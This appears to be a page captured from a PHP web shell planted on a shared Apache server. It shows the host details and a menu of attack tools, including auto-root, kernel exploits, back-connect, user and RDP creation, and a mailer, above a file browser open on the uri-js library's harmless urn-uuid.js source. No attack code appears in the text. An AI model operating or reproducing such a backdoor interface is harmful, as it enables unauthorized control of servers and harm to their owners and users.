Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
uri-js /
dist /
esnext /
schemes /
[ HOME SHELL ]
Name
Size
Permission
Action
http.d.ts
108
B
-rw-r--r--
http.js
959
B
-rw-r--r--
http.js.map
841
B
-rw-r--r--
https.d.ts
108
B
-rw-r--r--
https.js
212
B
-rw-r--r--
https.js.map
312
B
-rw-r--r--
mailto.d.ts
359
B
-rw-r--r--
mailto.js
7.56
KB
-rw-r--r--
mailto.js.map
7.05
KB
-rw-r--r--
urn-uuid.d.ts
279
B
-rw-r--r--
urn-uuid.js
868
B
-rw-r--r--
urn-uuid.js.map
832
B
-rw-r--r--
urn.d.ts
324
B
-rw-r--r--
urn.js
2
KB
-rw-r--r--
urn.js.map
1.89
KB
-rw-r--r--
ws.d.ts
228
B
-rw-r--r--
ws.js
1.62
KB
-rw-r--r--
ws.js.map
1.58
KB
-rw-r--r--
wss.d.ts
108
B
-rw-r--r--
wss.js
198
B
-rw-r--r--
wss.js.map
307
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : urn-uuid.js
const UUID = /^[0-9A-Fa-f]{8}(?:\-[0-9A-Fa-f]{4}){3}\-[0-9A-Fa-f]{12}$/; const UUID_PARSE = /^[0-9A-Fa-f\-]{36}/; //RFC 4122 const handler = { scheme: "urn:uuid", parse: function (urnComponents, options) { const uuidComponents = urnComponents; uuidComponents.uuid = uuidComponents.nss; uuidComponents.nss = undefined; if (!options.tolerant && (!uuidComponents.uuid || !uuidComponents.uuid.match(UUID))) { uuidComponents.error = uuidComponents.error || "UUID is not valid."; } return uuidComponents; }, serialize: function (uuidComponents, options) { const urnComponents = uuidComponents; //normalize UUID urnComponents.nss = (uuidComponents.uuid || "").toLowerCase(); return urnComponents; }, }; export default handler; //# sourceMappingURL=urn-uuid.js.map
Close